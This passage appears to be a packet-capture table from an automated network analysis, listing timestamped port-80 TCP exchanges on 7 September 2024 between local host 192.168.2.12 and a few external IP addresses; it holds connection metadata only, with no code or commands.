                                                                                                                                                                    Sep 7, 2024 15:34:59.053364992 CEST8049808172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.053437948 CEST4980880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.053493977 CEST4980880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.175462008 CEST4980980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.180355072 CEST804980945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.180459023 CEST4980980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.180615902 CEST4980980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.181148052 CEST4981080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.185605049 CEST804980945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.185681105 CEST4980980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.185888052 CEST8049810172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.185959101 CEST4981080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.186029911 CEST4981080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.190784931 CEST8049810172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.687227011 CEST8049810172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.687256098 CEST8049810172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.687320948 CEST4981080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:59.687377930 CEST4981080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:00.991697073 CEST4981180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:00.996526003 CEST804981188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:00.996597052 CEST4981180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:00.996694088 CEST4981180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:00.997334003 CEST4981280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:01.001718044 CEST804981188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:01.001775026 CEST4981180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:01.002101898 CEST8049812172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:01.002165079 CEST4981280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:01.008920908 CEST4981280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:01.013926029 CEST8049812172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:01.504076004 CEST8049812172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:01.504185915 CEST8049812172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:01.504229069 CEST4981280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:01.504287958 CEST4981280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:02.615288973 CEST4981380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:02.620075941 CEST804981388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:02.620165110 CEST4981380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:02.635360003 CEST4981380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:02.635885954 CEST4981480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:02.640182018 CEST804981388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:02.640254021 CEST4981380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:02.640645027 CEST8049814172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:02.640710115 CEST4981480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:02.640810966 CEST4981480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:02.645528078 CEST8049814172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:03.141856909 CEST8049814172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:03.141884089 CEST8049814172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:03.141947031 CEST4981480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:03.142026901 CEST4981480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:04.405128956 CEST4981680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:04.410130024 CEST804981664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:04.410223007 CEST4981680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:04.415215969 CEST4981680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:04.415781021 CEST4981780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:04.420228958 CEST804981664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:04.420308113 CEST4981680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:04.420598030 CEST8049817172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:04.420670986 CEST4981780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:04.430778980 CEST4981780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:04.435627937 CEST8049817172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:04.910684109 CEST8049817172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:04.910721064 CEST8049817172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:04.910768986 CEST4981780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:04.910823107 CEST4981780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:05.383996010 CEST4981880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:05.388909101 CEST804981864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:05.388971090 CEST4981880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:05.389053106 CEST4981880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:05.389662027 CEST4981980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:05.394196987 CEST804981864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:05.394273043 CEST4981880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:05.394447088 CEST8049819172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:05.394511938 CEST4981980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:05.394638062 CEST4981980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:05.399422884 CEST8049819172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:05.885556936 CEST8049819172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:05.885587931 CEST8049819172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:05.885705948 CEST4981980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:05.885752916 CEST4981980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.679402113 CEST4982080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.684711933 CEST804982045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:06.684802055 CEST4982080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.696499109 CEST4982080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.697118998 CEST4982180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.702068090 CEST804982045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:06.702155113 CEST4982080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.702548981 CEST8049821172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:06.702621937 CEST4982180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.712027073 CEST4982180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:06.716888905 CEST8049821172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.254245996 CEST8049821172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.254354954 CEST8049821172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.254365921 CEST8049821172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.254384995 CEST4982180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:07.254421949 CEST4982180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:07.255124092 CEST4982180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:07.390645027 CEST4982280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:07.395581007 CEST804982264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.396939993 CEST4982280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:07.397017956 CEST4982280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:07.397562027 CEST4982380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:07.402070999 CEST804982264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.402394056 CEST8049823172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.402503967 CEST4982280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:07.402509928 CEST4982380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:07.402612925 CEST4982380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:07.407377958 CEST8049823172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.887566090 CEST8049823172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.887728930 CEST8049823172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:07.887798071 CEST4982380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:07.887865067 CEST4982380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:08.607734919 CEST4982480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:08.612565994 CEST804982464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:08.612670898 CEST4982480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:08.612768888 CEST4982480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:08.613360882 CEST4982580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:08.617774963 CEST804982464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:08.617832899 CEST4982480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:08.618191957 CEST8049825172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:08.618536949 CEST4982580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:08.618633986 CEST4982580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:08.624041080 CEST8049825172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:09.117150068 CEST8049825172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:09.117198944 CEST8049825172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:09.117257118 CEST4982580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:09.117300034 CEST4982580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:10.707458973 CEST4982680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:10.712318897 CEST804982664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:10.712400913 CEST4982680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:10.712502956 CEST4982680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:10.713041067 CEST4982780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:10.717549086 CEST804982664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:10.717613935 CEST4982680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:10.717823029 CEST8049827172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:10.717879057 CEST4982780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:10.717966080 CEST4982780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:10.722778082 CEST8049827172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.207411051 CEST8049827172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.207511902 CEST8049827172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.207557917 CEST4982780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.207577944 CEST4982780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.332130909 CEST4982880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.337023020 CEST804982845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.337080956 CEST4982880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.337150097 CEST4982880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.337605000 CEST4982980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.342133999 CEST804982845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.342179060 CEST4982880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.342391014 CEST8049829172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.342448950 CEST4982980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.342515945 CEST4982980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.347258091 CEST8049829172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.861417055 CEST8049829172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.861449003 CEST8049829172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:11.861515045 CEST4982980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:11.861591101 CEST4982980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:14.344403028 CEST4983080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:14.349247932 CEST804983064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:14.349322081 CEST4983080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:14.352638960 CEST4983080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:14.353193998 CEST4983180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:14.357594967 CEST804983064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:14.357656002 CEST4983080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:14.357949972 CEST8049831172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:14.358015060 CEST4983180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:14.368383884 CEST4983180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:14.373128891 CEST8049831172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:14.847193003 CEST8049831172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:14.847265005 CEST8049831172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:14.847316980 CEST4983180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:14.847342014 CEST4983180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.520452976 CEST4983280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.525230885 CEST804983245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:15.525294065 CEST4983280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.525372028 CEST4983280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.525939941 CEST4983380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.530482054 CEST804983245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:15.530536890 CEST4983280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.530720949 CEST8049833172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:15.530778885 CEST4983380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.540424109 CEST4983380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:15.545937061 CEST8049833172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:16.034637928 CEST8049833172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:16.034653902 CEST8049833172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:16.034771919 CEST4983380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:16.034771919 CEST4983380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:17.817878008 CEST4983480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:17.822730064 CEST804983488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:17.822802067 CEST4983480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:17.822870970 CEST4983480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:17.823318005 CEST4983580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:17.827935934 CEST804983488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:17.827991962 CEST4983480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:17.828147888 CEST8049835172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:17.828208923 CEST4983580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:17.837033033 CEST4983580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:17.841829062 CEST8049835172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:18.390099049 CEST8049835172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:18.390117884 CEST8049835172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:18.390178919 CEST4983580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:18.390273094 CEST4983580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.110328913 CEST4983680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:19.115185022 CEST804983664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.115266085 CEST4983680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:19.115341902 CEST4983680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:19.115853071 CEST4983780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.120388985 CEST804983664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.120449066 CEST4983680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:19.120599985 CEST8049837172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.120666027 CEST4983780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.120829105 CEST4983780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.125798941 CEST8049837172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.611469984 CEST8049837172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.611496925 CEST8049837172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.611555099 CEST4983780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.611645937 CEST4983780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.722388029 CEST4983880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:19.727221966 CEST804983888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.727617025 CEST4983880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:19.727617025 CEST4983880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:19.728238106 CEST4983980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.732573986 CEST804983888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.732690096 CEST4983880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:19.733066082 CEST8049839172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:19.733136892 CEST4983980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.743432999 CEST4983980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:19.748444080 CEST8049839172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:20.219438076 CEST8049839172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:20.219579935 CEST4983980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:20.219667912 CEST8049839172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:20.219727039 CEST4983980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:24.269241095 CEST4984080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:24.274368048 CEST804984088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:24.274451971 CEST4984080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:24.274537086 CEST4984080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:24.275034904 CEST4984180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:24.280390978 CEST804984088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:24.280450106 CEST4984080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:24.280544043 CEST8049841172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:24.280606985 CEST4984180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:24.290174007 CEST4984180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:24.295039892 CEST8049841172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:24.795100927 CEST8049841172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:24.795311928 CEST4984180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:24.795624971 CEST8049841172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:24.795728922 CEST4984180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:26.961813927 CEST4984280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:26.966660023 CEST804984288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:26.966768980 CEST4984280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:26.966857910 CEST4984280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:26.967358112 CEST4984380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:26.972440004 CEST804984288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:26.972506046 CEST4984280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:35:26.972980022 CEST8049843172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:26.973037004 CEST4984380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:26.977761984 CEST4984380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:26.983057022 CEST8049843172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:27.458455086 CEST8049843172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:27.458597898 CEST4984380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:27.458631039 CEST8049843172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:27.458676100 CEST4984380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:28.296565056 CEST4984480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:28.302177906 CEST804984464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:28.302263021 CEST4984480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:28.302340984 CEST4984480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:28.302870035 CEST4984580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:28.308309078 CEST804984464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:28.308381081 CEST4984480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:28.308459044 CEST8049845172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:28.308536053 CEST4984580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:28.308625937 CEST4984580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:28.313904047 CEST8049845172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:28.792714119 CEST8049845172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:28.792826891 CEST4984580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:28.793313980 CEST8049845172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:28.793370962 CEST4984580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:29.461594105 CEST4984680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:29.466494083 CEST804984664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:29.466583967 CEST4984680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:29.477725983 CEST4984680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:29.478264093 CEST4984780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:29.482605934 CEST804984664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:29.482669115 CEST4984680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:35:29.483036995 CEST8049847172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:29.483114004 CEST4984780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:29.493495941 CEST4984780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:29.498611927 CEST8049847172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:29.994913101 CEST8049847172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:29.995053053 CEST4984780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:35:29.995512009 CEST8049847172.234.222.138192.168.2.12
